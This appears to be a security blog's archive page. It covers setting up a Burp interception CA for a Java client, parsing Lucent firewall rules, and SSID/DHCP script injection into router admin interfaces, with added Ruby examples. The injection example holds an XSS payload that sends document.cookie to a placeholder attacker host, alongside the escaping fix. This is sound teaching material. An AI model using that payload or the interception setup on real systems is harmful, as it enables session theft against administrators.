x509 certificate generation

Generate the key and a self-signed certificate with OpenSSL:

$ openssl genrsa 1024 > foo.key
$ openssl req -new -x509 -nodes -sha1 -days 7300 -key foo.key > foo.crt
$ openssl pkcs12 -export -out foo.p12 -in foo.crt -inkey foo.key -name "your name"

You will need the .p12 file (it contains both the key and the certificate) to configure Burp, and the .crt file to add to the Java keystore the client trusts. Burp's help page explains how to import the .p12 as its CA certificate. Note that a 1024-bit RSA key and a SHA-1 signature are well below current baselines: on a modern JRE use openssl genrsa 2048 and -sha256 instead, or the client may reject the certificate outright.

Create a Java keystore, import the certificate

Straightforward enough (just remember the password you entered):

keytool.exe -import -file foo.crt -keystore usefulfor.jks -alias burpcert

Run the application and point it to your keystore

java \
  -Djavax.net.ssl.trustStore=usefulfor.jks \
  -Djavax.net.ssl.trustStorePassword=password \
  -Djavax.net.debug=all  \
  com.usefulfor.Demo

Other properties you may need in order to tweak the SSL configuration further are javax.net.ssl.keyStore and javax.net.ssl.keyStorePassword; those hold the client's own certificate and key and only matter when the server asks for client authentication. Two caveats: javax.net.debug=all is extremely verbose, and javax.net.debug=ssl:handshake is usually enough to see which certificate was rejected and why; and these system properties only affect the default SSLContext, so a client that builds its own SSLContext or TrustManager (or pins a certificate) will ignore your truststore and has to be patched or hooked instead.
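The same three artefacts built programmatically, as an added example that is neither the original post's commands nor Burp's own code. It uses Ruby's OpenSSL bindings with parameters a current JRE accepts (2048-bit RSA, SHA-256) and makes the certificate an explicit CA, since Burp uses the imported key and certificate to sign a per-host certificate for every site you intercept (openssl's default config adds the same basicConstraints through its v3_ca section). The common name, validity, export password and output directory are placeholders:

```ruby
require "openssl"

# Placeholder subject and validity; change to taste.
def build_intercept_ca(common_name: "Burp intercept CA (test)", days: 3650)
  key = OpenSSL::PKey::RSA.new(2048)

  cert = OpenSSL::X509::Certificate.new
  cert.version = 2                              # X.509 v3, required for extensions
  cert.serial = OpenSSL::BN.rand(64)
  cert.subject = OpenSSL::X509::Name.parse("/CN=#{common_name}")
  cert.issuer = cert.subject                    # self-signed
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after = cert.not_before + days * 86_400

  ef = OpenSSL::X509::ExtensionFactory.new
  ef.subject_certificate = cert
  ef.issuer_certificate = cert
  # Burp signs per-host certificates with this key, so this must be a CA cert.
  cert.add_extension(ef.create_extension("basicConstraints", "CA:TRUE", true))
  cert.add_extension(ef.create_extension("keyUsage", "keyCertSign,cRLSign", true))
  cert.add_extension(ef.create_extension("subjectKeyIdentifier", "hash"))

  cert.sign(key, OpenSSL::Digest.new("SHA256"))
  [key, cert]
end

# PKCS#12 bundle for Burp (key + certificate), the equivalent of
# `openssl pkcs12 -export`. AES-256-CBC is chosen explicitly so the result does
# not depend on the linked OpenSSL version's default cipher.
def export_pkcs12(key, cert, password, friendly_name = "your name")
  OpenSSL::PKCS12.create(password, friendly_name, key, cert, nil,
                         "AES-256-CBC", "AES-256-CBC").to_der
end

# Checks worth running before importing anything: does the certificate verify
# with its own key, is it a CA, is it SHA-256 over a 2048-bit key, and does the
# PKCS#12 file open and give back the same key and certificate?
def sanity_check(key, cert, p12_der, password)
  p12 = OpenSSL::PKCS12.new(p12_der, password)
  bc = cert.extensions.find { |e| e.oid == "basicConstraints" }
  {
    self_signed: cert.verify(key),
    is_ca: !!(bc && bc.value.include?("CA:TRUE")),
    sha256: cert.signature_algorithm == "sha256WithRSAEncryption",
    bits: key.n.num_bits,
    p12_roundtrip: p12.certificate.to_der == cert.to_der && p12.key.to_der == key.to_der,
  }
end

if __FILE__ == $PROGRAM_NAME
  key, cert = build_intercept_ca
  p12 = export_pkcs12(key, cert, "changeme")          # placeholder password
  p sanity_check(key, cert, p12, "changeme")
  if (dir = ARGV[0])                                   # optional output directory
    File.binwrite(File.join(dir, "foo.key"), key.to_pem)
    File.binwrite(File.join(dir, "foo.crt"), cert.to_pem)
    File.binwrite(File.join(dir, "foo.p12"), p12)
  end
end
```

foo.crt is what goes into the Java keystore with keytool, foo.p12 is what Burp imports; the sanity check is the part people skip and then spend an hour debugging from javax.net.debug output.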

dradis v2.0 - flexibility unleashed

January 30th, 2009 by etd

It has been a long time since the last formal release of dradis (remember the dradis v1.2 one-click installer?). But that does not mean we have been doing nothing in the meantime ;-)

We have been working as hard as one can work: over 487 commits since then (check the stats), we went to DEFCON 16 where a pre-release of the new dradis v2.0 was showcased… But finally we are here, there is a new release ready for you to try and get addicted to!

Lots of new features: new web interface (+10 neatness, +20 usability), new internal architecture (+30 flexibility), new built-in modules (+10 usefulness)…

Read the rest of this entry »

Posted in Tools | 3 Comments »

DeepSec 2008

December 18th, 2008 by rdv

DeepSec 2008 took place in Vienna in November. For a period of two days attendees enjoyed a good set of talks, a good atmosphere and had the chance to talk to different people from different security backgrounds.

I was invited to present my ‘Behind Enemy lines’ research, which mainly focused on different attack techniques that are currently affecting a large number of administrative web interfaces.

The slides of this presentation can be found here: [1]

More information about this research can be found in the following white paper: [3] [4]

lucent firewall ruleset parser

December 1st, 2008 by etd

Recently I had to go through the ruleset of a Lucent firewall, and the truth is that the export format of the rules is anything but easy to read.

The information is split into three files:

  • rules file: Contains the rules, each one takes about 72 lines (rules have many properties, each property is written on a separate line). Rules match source hosts with destination hosts and services, no surprise there, but the value of any of these three key fields can be an alias.
  • hosts file: in this file the aliases for host groups are defined.
  • services file: service groups are defined here.

So the challenge here is: how do we merge these three files into something meaningful?

I know that purists can do this with a bash one-liner that uses grep, awk and sed, but ruby is my weapon of choice, so I created the lucent_metaparser.rb script. It basically takes the three files, applies some regular expressions to extract the information and store it in data structures, and then outputs the rules in a format that is easy to go through. Here is an example:

1047: (CH43) 10.0.1.12 ---(both)--- RF400 [permit https - change 43] - enabled | pass
CH43: tcp/443/* ()
10.0.1.12
RF400: 192.168.1.140-192.168.1.145;192.252.1.155;192.252.1.120;
1048: (tcp/80) RF132 ---(both)--- PK012 [web traffic to the dmz - change 74] - enabled | pass
tcp/80
RF132: 172.0.1.38-172.0.1.226 (external reverse proxies)
PK012: 10.15.2.1;10.15.2.2; (internal servers)

I know that it is not perfect and there is room for improvement, but the idea is that the script can be used as a starting point for the review process, and hopefully this will save us some time in the future :)
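A minimal version of the merge the script performs, added here as an example and not the original lucent_metaparser.rb. The three input files are constructed stand-ins (one "property: value" line per rule property, aliases as "NAME: member;member; (comment)"); the real Lucent export has many more lines per rule and a different layout, so the regular expressions would need adjusting, but the alias resolution and the review checks are the part that carries over. It also goes a little beyond the post's output: host aliases get an address count, and rules that reference undefined aliases or pass any-to-any are flagged up front.

```ruby
require "ipaddr"

# Constructed stand-in export files, not the real Lucent format.
RULES_FILE = <<~TXT
  rule: 1047
  source: 10.0.1.12
  destination: RF400
  service: CH43
  direction: both
  action: pass
  state: enabled
  comment: permit https - change 43

  rule: 1049
  source: *
  destination: *
  service: TMP01
  direction: both
  action: pass
  state: enabled
  comment: temporary - change 91
TXT
HOSTS_FILE = <<~TXT
  RF400: 192.168.1.140-192.168.1.145;192.252.1.155;192.252.1.120;
  RF132: 172.0.1.38-172.0.1.226; (external reverse proxies)
  PK012: 10.15.2.1;10.15.2.2; (internal servers)
TXT
SERVICES_FILE = "CH43: tcp/443/*\n"

Rule = Struct.new(:id, :src, :dst, :svc, :dir, :action, :state, :comment)

# One property per line, a blank line between rules.
def parse_rules(text)
  text.strip.split(/\n\s*\n/).map do |block|
    props = block.lines.map { |l| l.strip.split(/:\s*/, 2) }.to_h
    Rule.new(props["rule"], props["source"], props["destination"], props["service"],
             props["direction"], props["action"], props["state"], props["comment"])
  end
end

# "NAME: member;member; (optional comment)" -> { "NAME" => { members:, comment: } }
def parse_aliases(text)
  text.each_line.with_object({}) do |line, table|
    next unless line =~ /\A\s*(\w+):\s*([^(]*?)\s*(?:\((.*)\))?\s*\z/
    table[$1] = { members: $2.split(";").map(&:strip).reject(&:empty?), comment: $3 }
  end
end

# Field values that are not aliases: "*", an IPv4 address or range, proto/port[/port].
LITERAL = %r{\A(\*|\d+(\.\d+){3}(-\d+(\.\d+){3})?|[a-z]+/[\w*]+(/[\w*]+)?)\z}

# How many IPv4 addresses an alias covers, with ranges expanded.
def address_count(members)
  members.sum do |m|
    lo, hi = m.split("-", 2)
    hi ? IPAddr.new(hi).to_i - IPAddr.new(lo).to_i + 1 : 1
  end
end

# Summary line in the post's format, then one line per field with aliases expanded.
def render_rule(rule, hosts, services)
  lines = ["#{rule.id}: (#{rule.svc}) #{rule.src} ---(#{rule.dir})--- #{rule.dst} " \
           "[#{rule.comment}] - #{rule.state} | #{rule.action}"]
  [[rule.svc, services], [rule.src, hosts], [rule.dst, hosts]].each do |field, table|
    entry = table[field]
    if entry.nil?
      lines << field                        # a literal, nothing to expand
    else
      line = "#{field}: #{entry[:members].join(';')};"
      line += " (#{entry[:comment]})" if entry[:comment]
      line += " [#{address_count(entry[:members])} addresses]" if table.equal?(hosts)
      lines << line
    end
  end
  lines.join("\n")
end

# What a reviewer wants surfaced first: references to aliases that are never
# defined, and rules that pass everything between everything.
def review_findings(rules, hosts, services)
  rules.flat_map do |r|
    f = [[r.src, hosts], [r.dst, hosts], [r.svc, services]].filter_map do |field, table|
      "rule #{r.id}: undefined alias #{field}" unless table.key?(field) || field.match?(LITERAL)
    end
    f << "rule #{r.id}: any-to-any #{r.action} rule" if r.src == "*" && r.dst == "*"
    f
  end
end

if __FILE__ == $PROGRAM_NAME
  rules = parse_rules(RULES_FILE)
  hosts, services = parse_aliases(HOSTS_FILE), parse_aliases(SERVICES_FILE)
  rules.each { |r| puts render_rule(r, hosts, services), "" }
  puts review_findings(rules, hosts, services)
end
```

The address count is the quick way to spot a "single host" rule whose alias actually covers a /24, which is exactly the sort of thing that hides inside 72 lines of exported properties.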

Posted in Tools | No Comments »

DEFCON 16 - Las Vegas 2008

August 21st, 2008 by editor

hack-fu by Matt Hillman

Last week I attended DEFCON 16 in Las Vegas. I went last year as well, so I knew to expect the huge throngs of people, the strange mix of young, old, and crazy-haired and all the usual antics that happen when you gather around 7 thousand hackers in one place.

There’s a lot to do at DEFCON besides attending presentations, but this year I was there for business, not just pleasure, so I went on a presentation-attending marathon. I must admit that this year there were fewer “wow” moments as far as the talks were concerned, but there were still some decent talks and of course lots of opportunities to catch up with friends and acquaintances from around the world.

Here’s a list and some comments of the talks I attended:
Read the rest of this entry »

Posted in Events | 2 Comments »

SSID Script Injection

August 4th, 2008 by rdv

The administrative web interfaces for many wireless access points (APs) provide users with ‘Neighbourhood Wireless Scan’ functionality. This scans for all APs in range and displays the details of each one it identifies. However, examination of these administrative interfaces revealed that a large number of them do not properly sanitise the values received from neighbouring APs before displaying them.

An attacker could set up a fake AP with a malicious payload in the Service Set Identifier (SSID). The malicious SSID would be displayed in the ‘Neighbour’s Access Points Table’ page of the administrative interface and would be executed in the administrator’s browser when they scanned for APs. Read the rest of this entry »

Posted in hack-fu | 4 Comments »

DHCP Script Injection

August 4th, 2008 by rdv

A number of administrative applications are available which allow users to manage a network DHCP server via a web interface. This allows administrators to set up configuration options and view active DHCP leases.

It was found that a large number of these administrative web applications did not properly sanitise parameters that were passed to them from the DHCP server, and therefore ultimately from any client on the network, i.e. an attacker. In particular, a specially crafted DHCPREQUEST message containing malicious JavaScript or HTML code in the Host Name option (DHCP option 12) could be sent to the DHCP server; the malicious code would then be displayed in the DHCP active leases page of the vulnerable administrative application and would be executed in the administrator’s browser when they visited the page. Read the rest of this entry »
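The rendering defect behind both this post and the SSID one above, as an added example in Ruby that is not code from either post or from any affected product. The lease table, the neighbour scan and the payloads are constructed; the hostnames and attacker host are placeholders. It shows the verbatim rendering next to the escaped one, where the hostname actually comes from on the wire (option 12 with its one-byte length), and the 32-octet SSID limit that forces a payload in that field to be a short loader:

```ruby
require "cgi"

# Constructed sample data. Placeholder attacker host, not a real one.
PAYLOAD = "<script>new Image().src='//attacker.example/?c='+document.cookie</script>"
LEASES = [
  { ip: "192.168.1.50", mac: "00:11:22:33:44:55", hostname: "printer-01" },
  { ip: "192.168.1.51", mac: "00:11:22:33:44:66", hostname: PAYLOAD },
]
# 802.11 limits an SSID to 32 octets, so a payload there must be a loader.
NEIGHBOURS = [
  { ssid: "HomeNet", channel: 6 },
  { ssid: "<script src=//a.bc></script>", channel: 11 },   # 28 octets, fits
]

# Vulnerable rendering: attacker-controlled strings go into the page verbatim.
def render_table_vulnerable(rows, columns)
  trs = rows.map { |r| "<tr>" + columns.map { |c| "<td>#{r[c]}</td>" }.join + "</tr>" }
  "<table>#{trs.join}</table>"
end

# Hardened rendering: every cell is HTML-escaped at output time, whatever its origin.
def render_table_safe(rows, columns)
  trs = rows.map do |r|
    "<tr>" + columns.map { |c| "<td>#{CGI.escapeHTML(r[c].to_s)}</td>" }.join + "</tr>"
  end
  "<table>#{trs.join}</table>"
end

# Where the hostname comes from: option 12 is a tag/length/value triple with a
# one-byte length (RFC 2132), so the payload has to fit in 255 bytes.
def encode_hostname_option(hostname)
  raise ArgumentError, "option 12 value limited to 255 bytes" if hostname.bytesize > 255
  [12, hostname.bytesize, hostname].pack("CCa*")
end

# The server side typically just slices the bytes out, with no idea that a web
# interface will later drop them into HTML.
def decode_hostname_option(bytes)
  tag, len = bytes.unpack("CC")
  raise ArgumentError, "not a Host Name option" unless tag == 12
  bytes.byteslice(2, len)
end

SSID_MAX_OCTETS = 32
def ssid_fits?(ssid)
  ssid.bytesize <= SSID_MAX_OCTETS
end

if __FILE__ == $PROGRAM_NAME
  cols = [:ip, :mac, :hostname]
  puts "vulnerable: #{render_table_vulnerable(LEASES, cols)}"
  puts "escaped:    #{render_table_safe(LEASES, cols)}"
  opt = encode_hostname_option(PAYLOAD)
  puts "option 12 on the wire: #{opt.bytesize} bytes, hostname = #{decode_hostname_option(opt)}"
  puts "ssid payload fits: #{ssid_fits?(NEIGHBOURS[1][:ssid])}"
end
```

The fix is the same in both cases and does not depend on the protocol: treat every value that arrived over the network as untrusted and escape it for the context it is rendered into, rather than trying to validate hostnames or SSIDs on the way in.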

Posted in hack-fu | 3 Comments »

middleware and me (part 2)

July 9th, 2008 by admin

hack-fu by: rux0r

In the last article (middleware and me (part-1)) we looked at the concept of Middleware security and why it is often a neglected area. In this article we are moving on to look in detail at the security features that can be employed to protect this type of software. For the purposes of these discussions we are going to be focussing on the IBM Websphere MQ product, hopefully in the future I will be able to contrast these discussions against the security controls employed by a number of other messaging technologies.
Read the rest of this entry »

Posted in hack-fu | No Comments »

hack-fu by: bob

So… this is an amalgamation of several ideas and bits of work I’ve found floating around that I put together. The result is a handy pentesting/pwnage technique. The following blog that kicked this idea off discusses a modified Metasploit exploit module called smb_server.pm by Kurt Grutzmacher: NTLMv1, Metasploit and You. Around the same time I’d been playing with some ettercap filters, based on the below work at Irongeek: Fun with Ettercap Filters. These two sparked something and gave me a use for those huge LMHALFCHALLENGE rainbow tables I’d downloaded. Read the rest of this entry »

In addition to the changes released on the 4th of April, yesterday we released a Windows one-click installer for dradis.

The summary of the features of the v1.2 release:

  • in the client:
    • export to XML module is now part of the standard module set.
    • a new implementation of the command line parser: now it is possible to use single and double quotes to pass multi-word arguments to the different commands.
    • fixed the window.rb:159 bug.
  • in the server:
    • a slightly less annoying implementation of the web interface auto refresh functionality.
    • the services added through the web interface can have a name now :)
    • simple prevention against embedded XSS.

You can also download the platform-independent ruby source in the download section of the site.


Posted in Tools | No Comments »